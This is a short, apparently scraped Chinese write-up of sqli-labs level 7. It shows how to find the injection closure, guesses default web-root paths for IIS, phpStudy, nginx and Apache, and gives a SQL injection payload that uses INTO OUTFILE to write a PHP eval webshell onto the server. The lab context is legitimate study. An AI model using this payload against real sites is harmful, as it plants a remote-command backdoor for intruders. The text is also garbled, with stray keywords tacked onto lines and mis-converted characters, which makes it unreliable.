sqli(7)

前言php

第7關 導出文件GET字符型注入

步驟OK,可是就是不能寫入文件,不知是文件夾的問題仍是本身操做的問題。可是確實,沒有導入成功。html

1. 查看閉合,看源碼,發現閉合是((‘ ’));linux

 

 

 2.查看所在位置:nginx

@@datadir 讀取數據庫路徑
@@basedir MYSQL 獲取安裝路徑數據庫

可是在less7中,沒有輸出信息,因此咱們只能盲打:apache

winserver的iis默認路徑是c:/inetpub/wwwroot/,PHPstudy的是F:\phpStudy\PHPTutorial\WWWless

linux的nginx通常是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等,spa

apache 就/var/www/htm,/var/www/html/htdocs3d

 3.使用into outfile寫入一句話木馬,而後鏈接就好了。 code

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "路徑\\間隔"--+

 

4.我搭建的物理機,因此沒有嘗試連菜刀。還有個問題就是不能寫入文件,修改了文件夾屬性也不行。但願後面幾關能夠幫助我解開疑惑。

本站公眾號
   歡迎關注本站公眾號,獲取更多信息